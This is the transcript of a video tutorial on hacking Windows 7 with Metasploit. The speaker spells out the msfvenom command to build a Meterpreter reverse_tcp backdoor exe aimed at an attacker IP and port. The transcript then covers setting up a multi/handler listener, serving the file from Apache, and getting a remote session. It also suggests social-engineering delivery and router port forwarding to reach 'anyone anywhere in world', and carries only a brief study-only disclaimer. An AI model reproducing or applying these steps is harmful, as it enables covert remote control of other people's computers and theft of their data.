Hello everyone, welcome to this channel. So today's session is based on how to hack Windows using Metasploit. So basically you need two virtual operating systems. Okay, one will be for attacker and the another one is for victim. As you can see, I'm on Kali Linux right now. Okay, so this will be my attacker machine and the victim machines is Windows 7. I'm taking Windows 7 as victim machine. In this video I will demonstrate the practical on how to hack Windows 7 using Metasploit, and on the another video I will show you how to hack Windows 10 using Metasploit. On that we just need to bypass the firewall. Okay, nothing else. Okay, let's get back to our Kali machine, the attacker one. Here you need to type msf console on one terminal, and on the other side you need msf venom. This I like the most. Okay, I hope you will also love using MSF Venom for making payloads. Okay, all right. Now, now what is MSF console is all about? Mainly, it is a centralized console which gives you access with multiple attacking vectors, right? Even not only attacking vectors, exploits, auxiliaries to exploit a machine in various ways, right? And on the other side, which I have just opened down, like MSF Venom, it is a tool used to create payload of backdoor. Okay, it is already a part of Metasploit. There should be no confusion about MSF Venom, right? It is a part of Metasploit, which is used to create and exploit tools in various ways and techniques. Now, at first, we need to know the attacker's IP, right? My IP. So, wait a second. If config, the attacker's IP is 10.152.152.9. Let's copy it. Now I'm clearing this. Okay, now msf venom, so sorry guys, msf venom space hyphen p. Okay, now Windows, what payload, like P stands for payload, right? So hyphen p, and then we are going to type the payload which we are going to use. In this case we are using reverse underscore tcp1, so that is under Meterpreter, and Meterpreter is under Windows, right? So we have to give the whole path, Meterpreter slash reverse underscore tcp. Okay, now here we have used the payload, and we have used the agent, and agent like hyphen p, msf venom hyphen p, and then we have typed the payload name, right? Now we have to select the listening host and listening port. The attacker's listening host and port. Don't get confused here, right? We do not need the victim's IP or anything else. We just need to create a payload, whether a exe file or a text file or an image, anything which you want. Okay, and after that, with the help of social engineering, we will send it to victim's machine, right? So let's get, let's type the host, lhost. Here in my case my IP is my lhost. Okay, now lport will be, I'm using 44. Okay, wait a second. 4444. Okay, now we have to use another agent which is hyphen f, which stands for format, and here I'm going to use format exe file. Okay, now the path, we have to give the path where we need to save the file .exe file. So I will be saving it under root, and then desktop, and then victim.exe. Okay, click enter. It will take a bit time for creating the .exe file. Just wait for, okay, file is just created. Here you can see victim.exe. Okay, now what we need to do is we have to do the rest of our work in MSF console. We have to use the console. This will be our listening console where we will wait for the victim. Wait for the victim in the sense when he or she is going to click on that particular file or download that file and execute it, right? So here you need to type use exploit slash multi slash handler. We are going to set the listening port and IP, right? So options, here you can see it's already provided us with the L port, and now we just need to configure the L host, right? And before that we need to set the payload. So for that, set payload space, the payload was Windows slash Meterpreter slash reverse underscore TCP. Hit enter. Payload is being set to reverse underscore TCP, right? Now we will set the IP address. So for that, set lhost space the IP of attacker, not the victim. I'm again repeating the same, not the victim's IP. We need the attacker IP. It's all about attacker IP and attacker port. That's it. Okay. Now hit enter. Again, we will see the show options. Okay, it's all set. Lhost 10.152.152.9 and L port is 4444, right? Now click on run. It's on listening mode now. Now we need to do a little bit of thing, right? For sending the file, I will be using my own Apache server. So for that, I'm copying the .exe file and then var www html, and here I will create a folder named victim. Guys, please overlook this if you are seeing like, okay, gadha, yeah, fine. So under victim we have copied the item. Okay, now we will go back to victim's machine. Click open the browser. Now here type the IP like 10.152.152.9 slash victim. Enter. Here you can see the file which I have uploaded just now, victim.exe. Click on it. Now, if you are thinking like, sir, how to send this to victim, like this process or any other process, keep on mind one thing, like whenever you are practicing this thing, first of all, this is only for study purpose, not for harming anyone or harming anyone's privacy, right? Violating anyone's privacy, not harming, violating anyone's privacy. Okay, so when you are practicing this, you can use the same process which I have used, or other than that you can directly drag and drop, which because you are on virtual machines, right? And if we have two different systems with you, one is of Windows operating system and another one is Linux. Okay, so there you can simply copy with the help of pen drive or any other flash drives, right? So come back to the remaining part. Okay, internet is a bit slow. Wait a second, guys. Okay, yeah, it's completed. Click on it. It will ask for one permission for mm, maybe executed or what. Wait a second. Yeah, we have got the Metasploit session. Okay, so this is the way how you can hack into someone's PC, right? For different network, this process works on same network. Okay, for different network, you need port forwarding option. You have to enable it on your router, and after that, after setting it up, you can send it to anyone anywhere in world. Okay, now just type here sysinfo. You can see the computer name is MRX, OS Windows 7, architecture x64, domain name is Wellwisher, logged on users 2, okay, and the metadata session created is x86/Windows, okay. I hope you all like the video, guys. Wait for the Windows 10 one, okay. I will show you how to bypass the firewall security and get into someone's operating system. Thank you, guys. Thanks for watching.